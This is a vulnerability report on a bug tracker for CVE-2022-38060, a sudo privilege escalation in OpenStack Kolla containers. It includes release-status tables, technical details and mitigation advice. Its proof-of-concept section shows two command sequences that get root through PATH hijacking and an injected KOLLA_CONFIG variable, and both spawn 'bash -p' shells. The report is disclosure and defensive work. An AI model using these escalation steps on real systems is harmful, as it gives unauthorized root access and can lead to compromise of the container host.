sudo privilege escalation vulnerability (CVE-2022-38060)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
kolla |
Fix Released
|
High
|
Radosław Piliszek | ||
Ussuri |
Triaged
|
High
|
Radosław Piliszek | ||
Victoria |
Triaged
|
High
|
Radosław Piliszek | ||
Wallaby |
Fix Released
|
High
|
Radosław Piliszek | ||
Xena |
Fix Released
|
High
|
Radosław Piliszek | ||
Yoga |
Fix Released
|
High
|
Radosław Piliszek | ||
Zed |
Fix Released
|
High
|
Radosław Piliszek |
Bug Description
[OpenStack's vulnerability managers received the following report via encrypted E-mail]
### Summary
A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead increased privileges.
### Confirmed Vulnerable Versions
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
OpenStack Kolla git master 05194e7618
### Product URLs
Kolla - https:/
### CVSSv3 Score
8.8 - CVSS:3.
### CWE
CWE-269 - Improper Privilege Management
### Details
OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.
Several Kolla containers have sudoers policy to allow the application to run limited commands as root, which appears to be defined [here](https:/
Matching Defaults entries for nova on <host>:
setenv
User nova may run the following commands on <host>:
(root) NOPASSWD: /usr/local/
(root) NOPASSWD: /usr/local/
...
Of note is the `Defaults: %kolla setenv` line in /etc/sudoers. This allows users in the `kolla` group to modify environment variables, and there is no `secure_path` option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.
Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.
The first script, [kolla_
The second script, [kolla_
Some containers (e.g. nova_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.
### Exploit Proof of Concept
##### Method 1 (`kolla_
Observe current privilege level in container:
$ id
uid=42436(nova) gid=42436(nova) groups=
Create a script payload that will be executed as root:
$ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-
$ chmod 755 /tmp/update-
Update the shell's PATH environment variable to include the directory that the payload is in, and run the affected script with `sudo`:
$ PATH=/tmp:$PATH sudo -E /usr/local/
# id
uid=0(root) gid=0(root) groups=0(root)
##### Method 2 (`kolla_
Observe current privilege level in container:
$ id
uid=42436(nova) gid=42436(nova) groups=
Create a JSON object to be parsed by the script and export it to the appropriate environment variable:
$ export KOLLA_CONFIG=
Run the affected script with `sudo` and then execute the copied shell:
$ sudo -E /usr/local/
$ /tmp/bash -p
# id
uid=0(root) gid=0(root) groups=0(root)
### Mitigation
/etc/sudoers within the container should use the `secure_path` option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the `setenv` option would be removed from /etc/sudoers altogether, and `env_keep` could be used for any safe environment variables that do not introduce security holes.
To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.
### Credit
Keane O'Kelley and Brian Scott of Cisco ASIG
CVE References
lock status: | Metadata changes locked and limited to project staff |
information type: | Private Security → Public Security |
lock status: | Metadata changes unlocked |
I've subscribed the Cisco Talos account, at their request, as well as the OpenStack vulnerability managers and Kolla security reviewers groups.